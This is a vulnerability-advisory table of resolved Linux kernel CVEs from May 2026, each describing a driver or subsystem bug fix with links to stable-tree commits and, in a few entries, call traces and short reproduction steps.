| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: HID: magicmouse: Do not crash on missing msc->input Fake USB devices can send their own report descriptors for which the input_mapping() hook does not get called. In this case, msc->input stays NULL, leading to a crash at a later time. Detect this condition in the input_configured() hook and reject the device. This is not supposed to happen with actual magic mouse devices, but can be provoked by imposing as a magic mouse USB device. | 2026-05-06 | not yet calculated | CVE-2026-43140 | https://git.kernel.org/stable/c/db5ba06e7af9325519a03e52fccf4a9e7c1fd9b2 https://git.kernel.org/stable/c/165912d4321c692321c02793068d30700b4e0f1a https://git.kernel.org/stable/c/f6a3860241fbb556fd72332fa31c5e787004413b https://git.kernel.org/stable/c/243e1165eb03aca97d87aafa9c3130593837a1c2 https://git.kernel.org/stable/c/922bd3e498a4b8e445def6e6ffea2ad3682ad516 https://git.kernel.org/stable/c/5bbe266272d86c0657e8253600f3d5b74fb7b2ae https://git.kernel.org/stable/c/36c83c1329dd881f290f7df2feadfb9a21775108 https://git.kernel.org/stable/c/17abd396548035fbd6179ee1a431bd75d49676a7 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ntb: ntb_hw_switchtec: Fix shift-out-of-bounds for 0 mw lut Number of MW LUTs depends on NTB configuration and can be set to zero, in such scenario rounddown_pow_of_two will cause undefined behaviour and should not be performed. This patch ensures that rounddown_pow_of_two is called on valid value. | 2026-05-06 | not yet calculated | CVE-2026-43141 | https://git.kernel.org/stable/c/d652ef399f131fcd5f8f34266167449ee7c9e5b3 https://git.kernel.org/stable/c/5590cd04d6845c01a6bad985a491c58af6fb5389 https://git.kernel.org/stable/c/a11d03d116eef138a7249202bd772c8e61915aec https://git.kernel.org/stable/c/d0559d07afabfddaaded6a61a16154486b956764 https://git.kernel.org/stable/c/2e4d5e8d86a969318340be95470bb76e52392082 https://git.kernel.org/stable/c/a133e3caf844a3f56b6eef89ddaa66115874f6bd https://git.kernel.org/stable/c/1a867d0d79a4a570a33f2f433919ad2bd7a27b67 https://git.kernel.org/stable/c/186615f8855a0be4ee7d3fcd09a8ecc10e783b08 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: iris: gen1: Destroy internal buffers after FW releases After the firmware releases internal buffers, the driver was not destroying them. This left stale allocations that were no longer used, especially across resolution changes where new buffers are allocated per the updated requirements. As a result, memory was wasted until session close. Destroy internal buffers once the release response is received from the firmware. | 2026-05-06 | not yet calculated | CVE-2026-43142 | https://git.kernel.org/stable/c/7cde76db8883ec8a3d1456068079ecadbfb15ca5 https://git.kernel.org/stable/c/d4457f23ac0130240053a34be663f0fade3bb371 https://git.kernel.org/stable/c/1dabf00ee206eceb0f08a1fe5d1ce635f9064338 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mfd: core: Add locking around 'mfd_of_node_list' Manipulating a list in the kernel isn't safe without some sort of mutual exclusion. Add a mutex any time we access / modify 'mfd_of_node_list' to prevent possible crashes. | 2026-05-06 | not yet calculated | CVE-2026-43143 | https://git.kernel.org/stable/c/dcfa679bba02412f2087be21cf06ae88b1f4e0ef https://git.kernel.org/stable/c/e2e7c275f557e2b75e3128f4818063798248774c https://git.kernel.org/stable/c/db131ef9d8980cf60dcac8cf94c036eccf75e5d0 https://git.kernel.org/stable/c/9b02e3fec3a7fcb990b4d3bd3b13d7edf123dca6 https://git.kernel.org/stable/c/45341856ecda1d56689451abd5cf1d1aa57dbe47 https://git.kernel.org/stable/c/20117c92bcf9c11afd64d7481d8f94fdf410726e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: brcmfmac: Fix potential kernel oops when probe fails When probe of the sdio brcmfmac device fails for some reasons (i.e. missing firmware), the sdiodev->bus is set to error instead of NULL, thus the cleanup later in brcmf_sdio_remove() tries to free resources via invalid bus pointer. This happens because sdiodev->bus is set 2 times: first in brcmf_sdio_probe() and second time in brcmf_sdiod_probe(). Fix this by changing the brcmf_sdio_probe() function to return the error code and set sdio->bus only there. | 2026-05-06 | not yet calculated | CVE-2026-43144 | https://git.kernel.org/stable/c/64ccb0aac41c5055780c2a58bbe2c1b362ceccde https://git.kernel.org/stable/c/379aac7ee8240848aa35f605b06addb4617c863e https://git.kernel.org/stable/c/243307a0d1b0d01538e202c00454c28b21d4432e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: remoteproc: imx_rproc: Fix invalid loaded resource table detection imx_rproc_elf_find_loaded_rsc_table() may incorrectly report a loaded resource table even when the current firmware does not provide one. When the device tree contains a "rsc-table" entry, priv->rsc_table is non-NULL and denotes where a resource table would be located if one is present in memory. However, when the current firmware has no resource table, rproc->table_ptr is NULL. The function still returns priv->rsc_table, and the remoteproc core interprets this as a valid loaded resource table. Fix this by returning NULL from imx_rproc_elf_find_loaded_rsc_table() when there is no resource table for the current firmware (i.e. when rproc->table_ptr is NULL). This aligns the function's semantics with the remoteproc core: a loaded resource table is only reported when a valid table_ptr exists. With this change, starting firmware without a resource table no longer triggers a crash. | 2026-05-06 | not yet calculated | CVE-2026-43145 | https://git.kernel.org/stable/c/91baf24d972ea3c04a75dd18821c03d223c0dbc0 https://git.kernel.org/stable/c/fcec79b6a3649ae7b1f659267602ca402c240d6e https://git.kernel.org/stable/c/9bd98d088f47153a81a6ec8162b4415c64aa7f39 https://git.kernel.org/stable/c/65379adf7d231c930572db45933ff4538f4c5128 https://git.kernel.org/stable/c/500778df9e4c313190368908ff40c23948508e97 https://git.kernel.org/stable/c/198c629bd03863591f3fbf5ce8ff974a33f13dc9 https://git.kernel.org/stable/c/26aa5295010ffaebcf8f1991c53fa7cf2ee1b20d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: iris: Add buffer to list only after successful allocation Move `list_add_tail()` to after `dma_alloc_attrs()` succeeds when creating internal buffers. Previously, the buffer was enqueued in `buffers->list` before the DMA allocation. If the allocation failed, the function returned `-ENOMEM` while leaving a partially initialized buffer in the list, which could lead to inconsistent state and potential leaks. By adding the buffer to the list only after `dma_alloc_attrs()` succeeds, we ensure the list contains only valid, fully initialized buffers. | 2026-05-06 | not yet calculated | CVE-2026-43146 | https://git.kernel.org/stable/c/45b30f65feeb4d5570d5337793bb0f298be813d2 https://git.kernel.org/stable/c/98b4c4c90f1e11caecbe2093dbe3a901d338bc81 https://git.kernel.org/stable/c/2d0bbd982dfdd67da488a772f7a8a1bdca7642bf |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Revert "PCI/IOV: Add PCI rescan-remove locking when enabling/disabling SR-IOV" This reverts commit 05703271c3cd ("PCI/IOV: Add PCI rescan-remove locking when enabling/disabling SR-IOV"), which causes a deadlock by recursively taking pci_rescan_remove_lock when sriov_del_vfs() is called as part of pci_stop_and_remove_bus_device(). For example with the following sequence of commands: $ echo <NUM> > /sys/bus/pci/devices/<pf>/sriov_numvfs $ echo 1 > /sys/bus/pci/devices/<pf>/remove A trimmed trace of the deadlock on a mlx5 device is as below: zsh/5715 is trying to acquire lock: 000002597926ef50 (pci_rescan_remove_lock){+.+.}-{3:3}, at: sriov_disable+0x34/0x140 but task is already holding lock: 000002597926ef50 (pci_rescan_remove_lock){+.+.}-{3:3}, at: pci_stop_and_remove_bus_device_locked+0x24/0x80 ... Call Trace: [<00000259778c4f90>] dump_stack_lvl+0xc0/0x110 [<00000259779c844e>] print_deadlock_bug+0x31e/0x330 [<00000259779c1908>] __lock_acquire+0x16c8/0x32f0 [<00000259779bffac>] lock_acquire+0x14c/0x350 [<00000259789643a6>] __mutex_lock_common+0xe6/0x1520 [<000002597896413c>] mutex_lock_nested+0x3c/0x50 [<00000259784a07e4>] sriov_disable+0x34/0x140 [<00000258f7d6dd80>] mlx5_sriov_disable+0x50/0x80 [mlx5_core] [<00000258f7d5745e>] remove_one+0x5e/0xf0 [mlx5_core] [<00000259784857fc>] pci_device_remove+0x3c/0xa0 [<000002597851012e>] device_release_driver_internal+0x18e/0x280 [<000002597847ae22>] pci_stop_bus_device+0x82/0xa0 [<000002597847afce>] pci_stop_and_remove_bus_device_locked+0x5e/0x80 [<00000259784972c2>] remove_store+0x72/0x90 [<0000025977e6661a>] kernfs_fop_write_iter+0x15a/0x200 [<0000025977d7241c>] vfs_write+0x24c/0x300 [<0000025977d72696>] ksys_write+0x86/0x110 [<000002597895b61c>] __do_syscall+0x14c/0x400 [<000002597896e0ee>] system_call+0x6e/0x90 This alone is not a complete fix as it restores the issue the cited commit tried to solve. A new fix will be provided as a follow on. | 2026-05-06 | not yet calculated | CVE-2026-43147 | https://git.kernel.org/stable/c/f61cdd7e9b67bb8961b0a81bf294b78343e5db05 https://git.kernel.org/stable/c/0de341b2365bad430aade0853fe09c2cbe468f59 https://git.kernel.org/stable/c/83651d37474c762920e345a3a0828f975ca4d732 https://git.kernel.org/stable/c/639265296fe6ee21b6f00e00ee2bab65f3b07252 https://git.kernel.org/stable/c/d47f27e145f8bd13f3c230da5e3af29225b4a2f7 https://git.kernel.org/stable/c/40f67686a5002c0c322fac918406bbc8d9c2ec2f https://git.kernel.org/stable/c/58677783c89681871077f50a7042b0c6380c4fd8 https://git.kernel.org/stable/c/2fa119c0e5e528453ebae9e70740e8d2d8c0ed5a |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: powerpc/smp: Add check for kcalloc() failure in parse_thread_groups() As kcalloc() may fail, check its return value to avoid a NULL pointer dereference when passing it to of_property_read_u32_array(). | 2026-05-06 | not yet calculated | CVE-2026-43148 | https://git.kernel.org/stable/c/1de31dba19c3cd0c1caf388a286b46df638f0b91 https://git.kernel.org/stable/c/b265e53d9adfbb5751713185843f7188aa9dd066 https://git.kernel.org/stable/c/9d0ca11258e7b452653d04310addfec1753de1a2 https://git.kernel.org/stable/c/ca46d2092f307385a7acfb42632056570d6dbbbc https://git.kernel.org/stable/c/9b85c8f624b0f8cf9b932f5a65dacd56a1f47a72 https://git.kernel.org/stable/c/8b221db0b7d24675e465e98d9326d298025a4e8d https://git.kernel.org/stable/c/33c1c6d8a28a2761ac74b0380b2563cf546c2a3a |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: wan/fsl_ucc_hdlc: Fix dma_free_coherent() in uhdlc_memclean() The priv->rx_buffer and priv->tx_buffer are alloc'd together as contiguous buffers in uhdlc_init() but freed as two buffers in uhdlc_memclean(). Change the cleanup to only call dma_free_coherent() once on the whole buffer. | 2026-05-06 | not yet calculated | CVE-2026-43149 | https://git.kernel.org/stable/c/6496fb830cbb741d831225cc4e7e5601c6e42970 https://git.kernel.org/stable/c/ba8d8429e5d6c36f9a654d2b96b9e043c43d92b4 https://git.kernel.org/stable/c/011ae5dd84dc9f05eb9b8e1adff44252ac776e7b https://git.kernel.org/stable/c/0f85a9655445e67bb0238cfc983d7c383b54938e https://git.kernel.org/stable/c/84b932bc9899d43e5829e6cf088b72d73a922b2b https://git.kernel.org/stable/c/d8a522085d09b30aba1016daf1dddac37c0f0285 https://git.kernel.org/stable/c/d68994e37ac3b285692559776e0279a88a3b5f8d https://git.kernel.org/stable/c/36bd7d5deef936c4e1e3cd341598140e5c14c1d3 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Revert "media: iris: Add sanity check for stop streaming" This reverts commit ad699fa78b59241c9d71a8cafb51525f3dab04d4. Revert the check that skipped stop_streaming when the instance was in IRIS_INST_ERROR, as it caused multiple regressions: 1. Buffers were not returned to vb2 when the instance was already in error state, triggering warnings in the vb2 core because buffer completion was skipped. 2. If a session failed early (e.g. unsupported configuration), the instance transitioned to IRIS_INST_ERROR. When userspace attempted to stop streaming for cleanup, stop_streaming was skipped due to the added check, preventing proper teardown and leaving the firmware in an inconsistent state. | 2026-05-06 | not yet calculated | CVE-2026-43151 | https://git.kernel.org/stable/c/bd4f8fa216182f33c06d4c1e162975a0c42fb14e https://git.kernel.org/stable/c/a58b9d1c1cf81c0b29f1983c63c3e0c0caa68398 https://git.kernel.org/stable/c/370e19042fb8ac68109f8bdb0fdd8118baf39318 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: HID: hid-pl: handle probe errors Errors in init must be reported back or we'll follow a NULL pointer the first time FF is used. | 2026-05-06 | not yet calculated | CVE-2026-43152 | https://git.kernel.org/stable/c/78df3de826668fe842c6061a91bc1ed68f493e80 https://git.kernel.org/stable/c/8a84149337eb5e716e6d59f48ff0374dae8d8b2b https://git.kernel.org/stable/c/926e6715b48b575ed7754bf163a67686bb2eb111 https://git.kernel.org/stable/c/449004434e1f55be85604b2645f2d07c4a92fe53 https://git.kernel.org/stable/c/04e50f45b5175bb90a06f5003113cb4ed6ba44c2 https://git.kernel.org/stable/c/1d46d07458dba369daf61fb643d40a62c8423d8e https://git.kernel.org/stable/c/7d2f4fdf134e7398847417b25743e1e04928c7d7 https://git.kernel.org/stable/c/3756a272d2cf356d2203da8474d173257f5f8521 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: erofs: fix incorrect early exits in volume label handling Crafted EROFS images containing valid volume labels can trigger incorrect early returns, leading to folio reference leaks. However, this does not cause system crashes or other severe issues. | 2026-05-06 | not yet calculated | CVE-2026-43154 | https://git.kernel.org/stable/c/8d8a878ef60801d867119b3df6a93e2982d62a71 https://git.kernel.org/stable/c/d498bd168494ad4a4bce16192bfb9ce04ca19c9a https://git.kernel.org/stable/c/3afa4da38802a4cba1c23848a32284e7e57b831b |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mux: mmio: fix regmap leak on probe failure The mmio regmap that may be allocated during probe is never freed. Switch to using the device managed allocator so that the regmap is released on probe failures (e.g. probe deferral) and on driver unbind. | 2026-05-06 | not yet calculated | CVE-2026-43155 | https://git.kernel.org/stable/c/76096f156fe9dc9fbd6e4618088706e91b9b0a6c https://git.kernel.org/stable/c/cbde3c109d52564ae2c12e514c33c44345e84b2c https://git.kernel.org/stable/c/3c4ae63073d84abee5d81ce46d86a94e9dae9c89 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: usb: pegasus: enable basic endpoint checking pegasus_probe() fills URBs with hardcoded endpoint pipes without verifying the endpoint descriptors: - usb_rcvbulkpipe(dev, 1) for RX data - usb_sndbulkpipe(dev, 2) for TX data - usb_rcvintpipe(dev, 3) for status interrupts A malformed USB device can present these endpoints with transfer types that differ from what the driver assumes. Add a pegasus_usb_ep enum for endpoint numbers, replacing magic constants throughout. Add usb_check_bulk_endpoints() and usb_check_int_endpoints() calls before any resource allocation to verify endpoint types before use, rejecting devices with mismatched descriptors at probe time, and avoid triggering assertion. Similar fix to - commit 90b7f2961798 ("net: usb: rtl8150: enable basic endpoint checking") - commit 9e7021d2aeae ("net: usb: catc: enable basic endpoint checking") | 2026-05-06 | not yet calculated | CVE-2026-43156 | https://git.kernel.org/stable/c/a3e64e950a3981a8199de9798f6d21261b959171 https://git.kernel.org/stable/c/229dc9b9db475ac900182bafe258943e0e054c6d https://git.kernel.org/stable/c/26b3ec62fa1a94ac801feca47f040fc729b3c174 https://git.kernel.org/stable/c/35854ed5c40b02f95824e44398f9d2ba33727203 https://git.kernel.org/stable/c/67ba6b13dbcaf45681fb6758794c5ac5fa589a6c https://git.kernel.org/stable/c/d2e7c898cc02dfe42443489a67a45ed616cb76e9 https://git.kernel.org/stable/c/2705709f6574a088aab246af72fc95f2fea51484 https://git.kernel.org/stable/c/3d7e6ce34f4fcc7083510c28b17a7c36462a25d4 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: octeontx2-af: CGX: fix bitmap leaks The RX/TX flow-control bitmaps (rx_fc_pfvf_bmap and tx_fc_pfvf_bmap) are allocated by cgx_lmac_init() but never freed in cgx_lmac_exit(). Unbinding and rebinding the driver therefore triggers kmemleak: unreferenced object (size 16): backtrace: rvu_alloc_bitmap cgx_probe Free both bitmaps during teardown. | 2026-05-06 | not yet calculated | CVE-2026-43157 | https://git.kernel.org/stable/c/ad8a13a45c5c24d0d32de9a1c3fd58498a675ece https://git.kernel.org/stable/c/013ac469596a0b8671e62d89c89ae0bd46bbe667 https://git.kernel.org/stable/c/ccef79af58b43787c25710c9da96651c6ddfe50f https://git.kernel.org/stable/c/6d389382ee655128056fbdab86baad8495ffbf33 https://git.kernel.org/stable/c/ccca14bbdcc25829d355b9f4d3249f43dadb71c1 https://git.kernel.org/stable/c/3def995c4ede842adf509c410e92d09a0cedc965 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: staging: rtl8723bs: fix null dereference in find_network The variable pwlan has the possibility of being NULL when passed into rtw_free_network_nolock() which would later dereference the variable. | 2026-05-06 | not yet calculated | CVE-2026-43159 | https://git.kernel.org/stable/c/3b1d0c9a1f78836d0bce6fdd37f596f22c19b03e https://git.kernel.org/stable/c/1aa9c59f4b96a9056c02476c7ca89e96d15e0645 https://git.kernel.org/stable/c/48b4dec3a8bfd667cd0cd767eaf511176193e9a1 https://git.kernel.org/stable/c/cc3f83b6fb3773ad943365d1cd774b4ec050332e https://git.kernel.org/stable/c/04d24a3654ed195485bc6346a9ef326fc494a34e https://git.kernel.org/stable/c/677490a6bd4c63acdf6f48e4aaf6a23d7e6a446f https://git.kernel.org/stable/c/7fa16ffed2b9d9d44940990c1f31159770769aeb https://git.kernel.org/stable/c/41460a19654c32d39fd0e3a3671cd8d4b7b8479f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mfd: macsmc: Initialize mutex Initialize struct apple_smc's mutex in apple_smc_probe(). Using the mutex uninitialized surprisingly resulted only in occasional NULL pointer dereferences in apple_smc_read() calls from the probe() functions of sub devices. | 2026-05-06 | not yet calculated | CVE-2026-43160 | https://git.kernel.org/stable/c/a1e9e299c0d9ea42ab1067b39fb72e976d3f1bdb https://git.kernel.org/stable/c/2d5932588f029f7787f52c29174fead9bbc6b2cf https://git.kernel.org/stable/c/414f65d6736342c77d4ec5e7373039f4a09250dd |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: iommu/vt-d: Skip dev-iotlb flush for inaccessible PCIe device without scalable mode PCIe endpoints with ATS enabled and passed through to userspace (e.g., QEMU, DPDK) can hard-lock the host when their link drops, either by surprise removal or by a link fault. Commit 4fc82cd907ac ("iommu/vt-d: Don't issue ATS Invalidation request when device is disconnected") adds pci_dev_is_disconnected() to devtlb_invalidation_with_pasid() so ATS invalidation is skipped only when the device is being safely removed, but it applies only when Intel IOMMU scalable mode is enabled. With scalable mode disabled or unsupported, a system hard-lock occurs when a PCIe endpoint's link drops because the Intel IOMMU waits indefinitely for an ATS invalidation that cannot complete. Call Trace: qi_submit_sync qi_flush_dev_iotlb __context_flush_dev_iotlb.part.0 domain_context_clear_one_cb pci_for_each_dma_alias device_block_translation blocking_domain_attach_dev iommu_deinit_device __iommu_group_remove_device iommu_release_device iommu_bus_notifier blocking_notifier_call_chain bus_notify device_del pci_remove_bus_device pci_stop_and_remove_bus_device pciehp_unconfigure_device pciehp_disable_slot pciehp_handle_presence_or_link_change pciehp_ist Commit 81e921fd3216 ("iommu/vt-d: Fix NULL domain on device release") adds intel_pasid_teardown_sm_context() to intel_iommu_release_device(), which calls qi_flush_dev_iotlb() and can also hard-lock the system when a PCIe endpoint's link drops. Call Trace: qi_submit_sync qi_flush_dev_iotlb __context_flush_dev_iotlb.part.0 intel_context_flush_no_pasid device_pasid_table_teardown pci_pasid_table_teardown pci_for_each_dma_alias intel_pasid_teardown_sm_context intel_iommu_release_device iommu_deinit_device __iommu_group_remove_device iommu_release_device iommu_bus_notifier blocking_notifier_call_chain bus_notify device_del pci_remove_bus_device pci_stop_and_remove_bus_device pciehp_unconfigure_device pciehp_disable_slot pciehp_handle_presence_or_link_change pciehp_ist Sometimes the endpoint loses connection without a link-down event (e.g., due to a link fault); killing the process (virsh destroy) then hard-locks the host. Call Trace: qi_submit_sync qi_flush_dev_iotlb __context_flush_dev_iotlb.part.0 domain_context_clear_one_cb pci_for_each_dma_alias device_block_translation blocking_domain_attach_dev __iommu_attach_device __iommu_device_set_domain __iommu_group_set_domain_internal iommu_detach_group vfio_iommu_type1_detach_group vfio_group_detach_container vfio_group_fops_release __fput pci_dev_is_disconnected() only covers safe-removal paths; pci_device_is_present() tests accessibility by reading vendor/device IDs and internally calls pci_dev_is_disconnected(). On a ConnectX-5 (8 GT/s, x2) this costs ~70 µs. Since __context_flush_dev_iotlb() is only called on {attach,release}_dev paths (not hot), add pci_device_is_present() there to skip inaccessible devices and avoid the hard-lock. | 2026-05-06 | not yet calculated | CVE-2026-43161 | https://git.kernel.org/stable/c/48b3f08e68b29a79527869cdde7298ca2a9b9646 https://git.kernel.org/stable/c/e70d5feb10c5ba2bbf7ca400b8f39a2f82d653e8 https://git.kernel.org/stable/c/bc0490ad9edf5c6f98e39fbbee2877b85261a5ae https://git.kernel.org/stable/c/42662d19839f34735b718129ea200e3734b07e50 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: tegra-video: Fix memory leak in __tegra_channel_try_format() The state object allocated by __v4l2_subdev_state_alloc() must be freed with __v4l2_subdev_state_free() when it is no longer needed. In __tegra_channel_try_format(), two error paths return directly after v4l2_subdev_call() fails, without freeing the allocated 'sd_state' object. This violates the requirement and causes a memory leak. Fix this by introducing a cleanup label and using goto statements in the error paths to ensure that __v4l2_subdev_state_free() is always called before the function returns. | 2026-05-06 | not yet calculated | CVE-2026-43162 | https://git.kernel.org/stable/c/6c6f419fa9c44a4b7149b0292e01bff47308ba14 https://git.kernel.org/stable/c/ca921be7a1174d5d58b28f84b683c2c0079f18c5 https://git.kernel.org/stable/c/3ca2f09061736e72ef25eec2597d00f7f44094d3 https://git.kernel.org/stable/c/2dff8966a3a889dd9d248a7e15d963b4097efcc5 https://git.kernel.org/stable/c/d92e9a18f97a1d19d4c2ff81dcfbe43591f75b5a https://git.kernel.org/stable/c/43e5302d22334f1183dec3e0d5d8007eefe2817c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: md/bitmap: fix GPF in write_page caused by resize race A General Protection Fault occurs in write_page() during array resize: RIP: 0010:write_page+0x22b/0x3c0 [md_mod] This is a use-after-free race between bitmap_daemon_work() and __bitmap_resize(). The daemon iterates over `bitmap->storage.filemap` without locking, while the resize path frees that storage via md_bitmap_file_unmap(). `quiesce()` does not stop the md thread, allowing concurrent access to freed pages. Fix by holding `mddev->bitmap_info.mutex` during the bitmap update. | 2026-05-06 | not yet calculated | CVE-2026-43163 | https://git.kernel.org/stable/c/140cc839fbeb1ddb33a8da8811b716d88d3905b7 https://git.kernel.org/stable/c/ebcacc7ca22d5e8a03a970f0621ae1d1356b9ae8 https://git.kernel.org/stable/c/d3af62411e19752c663fe4f424dbf49d95a4cc7c https://git.kernel.org/stable/c/d92b8fac294b5f915c50e65ce4ae2262e53614ec https://git.kernel.org/stable/c/a437e3bf30e32846079e470c1ba5ee790bccdf89 https://git.kernel.org/stable/c/9a6f8cd28bb9bb6ed86a6df19331fb08016dee7f https://git.kernel.org/stable/c/5f73c8b33df9a605a591eab72d43a969600c1f8c https://git.kernel.org/stable/c/46ef85f854dfa9d5226b3c1c46493d79556c9589 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: hwmon: (nct7363) Fix a resource leak in nct7363_present_pwm_fanin When calling of_parse_phandle_with_args(), the caller is responsible to call of_node_put() to release the reference of device node. In nct7363_present_pwm_fanin, it does not release the reference, causing a resource leak. | 2026-05-06 | not yet calculated | CVE-2026-43165 | https://git.kernel.org/stable/c/c8cde3ddd12ad7d0e6b5a3e0ea3914a9a778adf4 https://git.kernel.org/stable/c/fb99b58763a95e20b214fc1dd86837ae00a400b7 https://git.kernel.org/stable/c/4923bbff0bcffe488b3aa76829c829bd15b02585 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: xfrm: always flush state and policy upon NETDEV_UNREGISTER event syzbot is reporting that "struct xfrm_state" refcount is leaking. unregister_netdevice: waiting for netdevsim0 to become free. Usage count = 2 ref_tracker: netdev@ffff888052f24618 has 1/1 users at __netdev_tracker_alloc include/linux/netdevice.h:4400 [inline] netdev_tracker_alloc include/linux/netdevice.h:4412 [inline] xfrm_dev_state_add+0x3a5/0x1080 net/xfrm/xfrm_device.c:316 xfrm_state_construct net/xfrm/xfrm_user.c:986 [inline] xfrm_add_sa+0x34ff/0x5fa0 net/xfrm/xfrm_user.c:1022 xfrm_user_rcv_msg+0x58e/0xc00 net/xfrm/xfrm_user.c:3507 netlink_rcv_skb+0x158/0x420 net/netlink/af_netlink.c:2550 xfrm_netlink_rcv+0x71/0x90 net/xfrm/xfrm_user.c:3529 netlink_unicast_kernel net/netlink/af_netlink.c:1318 [inline] netlink_unicast+0x5aa/0x870 net/netlink/af_netlink.c:1344 netlink_sendmsg+0x8c8/0xdd0 net/netlink/af_netlink.c:1894 sock_sendmsg_nosec net/socket.c:727 [inline] __sock_sendmsg net/socket.c:742 [inline] ____sys_sendmsg+0xa5d/0xc30 net/socket.c:2592 ___sys_sendmsg+0x134/0x1d0 net/socket.c:2646 __sys_sendmsg+0x16d/0x220 net/socket.c:2678 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline] do_syscall_64+0xcd/0xf80 arch/x86/entry/syscall_64.c:94 entry_SYSCALL_64_after_hwframe+0x77/0x7f This is because commit d77e38e612a0 ("xfrm: Add an IPsec hardware offloading API") implemented xfrm_dev_unregister() as no-op despite xfrm_dev_state_add() from xfrm_state_construct() acquires a reference to "struct net_device". I guess that that commit expected that NETDEV_DOWN event is fired before NETDEV_UNREGISTER event fires, and also assumed that xfrm_dev_state_add() is called only if (dev->features & NETIF_F_HW_ESP) != 0. Sabrina Dubroca identified steps to reproduce the same symptoms as below. echo 0 > /sys/bus/netdevsim/new_device dev=$(ls -1 /sys/bus/netdevsim/devices/netdevsim0/net/) ip xfrm state add src 192.168.13.1 dst 192.168.13.2 proto esp \ spi 0x1000 mode tunnel aead 'rfc4106(gcm(aes))' $key 128 \ offload crypto dev $dev dir out ethtool -K $dev esp-hw-offload off echo 0 > /sys/bus/netdevsim/del_device Like these steps indicate, the NETIF_F_HW_ESP bit can be cleared after xfrm_dev_state_add() acquired a reference to "struct net_device". Also, xfrm_dev_state_add() does not check for the NETIF_F_HW_ESP bit when acquiring a reference to "struct net_device". Commit 03891f820c21 ("xfrm: handle NETDEV_UNREGISTER for xfrm device") re-introduced the NETDEV_UNREGISTER event to xfrm_dev_event(), but that commit for unknown reason chose to share xfrm_dev_down() between the NETDEV_DOWN event and the NETDEV_UNREGISTER event. I guess that that commit missed the behavior in the previous paragraph. Therefore, we need to re-introduce xfrm_dev_unregister() in order to release the reference to "struct net_device" by unconditionally flushing state and policy. | 2026-05-06 | not yet calculated | CVE-2026-43167 | https://git.kernel.org/stable/c/166801e49a5b5fc127b8c9e2f110f303cfddfbc3 https://git.kernel.org/stable/c/a3c8fede034fa27892f87c863cbd5493167d17ed https://git.kernel.org/stable/c/59581778792cbaf8ad788f4a21dc663ce986050e https://git.kernel.org/stable/c/8c75c455ecd3bfd2f36abf66edb7021c4fa19ec4 https://git.kernel.org/stable/c/4efa91a28576054aae0e6dad9cba8fed8293aef8 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ocfs2: fix reflink preserve cleanup issue commit c06c303832ec ("ocfs2: fix xattr array entry __counted_by error") doesn't handle all cases and the cleanup job for preserved xattr entries still has bugs: - the 'last' pointer should be shifted by one unit after cleaning up an array entry. - the current code logic doesn't clean up the first entry when xh_count is 1. Note, commit c06c303832ec is also a bug fix for 0fe9b66c65f3. | 2026-05-06 | not yet calculated | CVE-2026-43168 | https://git.kernel.org/stable/c/c44d86ca949cb1e5566ad14510cc26fa1a17e2d8 https://git.kernel.org/stable/c/02acc9f72365e50eb45a56b7dacb9114ca3b503c https://git.kernel.org/stable/c/8ff329353134280b203cb2bce95311cb8f7cbd8a https://git.kernel.org/stable/c/bb273b68c1719c2925e05557f7e7099edb066680 https://git.kernel.org/stable/c/b2952dbeac2c3c527cb0519d5ffaeb95b062466a https://git.kernel.org/stable/c/3bdc3766aafb052aef4baadef455a84c1c0a059d https://git.kernel.org/stable/c/2f4daccd9d9b8b2952df7878df8c2e8ba6439398 https://git.kernel.org/stable/c/5138c936c2c82c9be8883921854bc6f7e1177d8c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/buddy: Prevent BUG_ON by validating rounded allocation When DRM_BUDDY_CONTIGUOUS_ALLOCATION is set, the requested size is rounded up to the next power-of-two via roundup_pow_of_two(). Similarly, for non-contiguous allocations with large min_block_size, the size is aligned up via round_up(). Both operations can produce a rounded size that exceeds mm->size, which later triggers BUG_ON(order > mm->max_order). Example scenarios: - 9G CONTIGUOUS allocation on 10G VRAM memory: roundup_pow_of_two(9G) = 16G > 10G - 9G allocation with 8G min_block_size on 10G VRAM memory: round_up(9G, 8G) = 16G > 10G Fix this by checking the rounded size against mm->size. For non-contiguous or range allocations where size > mm->size is invalid, return -EINVAL immediately. For contiguous allocations without range restrictions, allow the request to fall through to the existing __alloc_contig_try_harder() fallback. This ensures invalid user input returns an error or uses the fallback path instead of hitting BUG_ON. v2: (Matt A) - Add Fixes, Cc stable, and Closes tags for context | 2026-05-06 | not yet calculated | CVE-2026-43169 | https://git.kernel.org/stable/c/d764b8dd420098a4d253b8a5b27568c897edb2cf https://git.kernel.org/stable/c/6236c1cd9fdf433d39ed28b2491ccdfe7ae95061 https://git.kernel.org/stable/c/ecb32c60d8cbed2ee9ce9f343b6aa2f32babc727 https://git.kernel.org/stable/c/5488a29596cdba93a60a79398dc9b69d5bdadf92 |
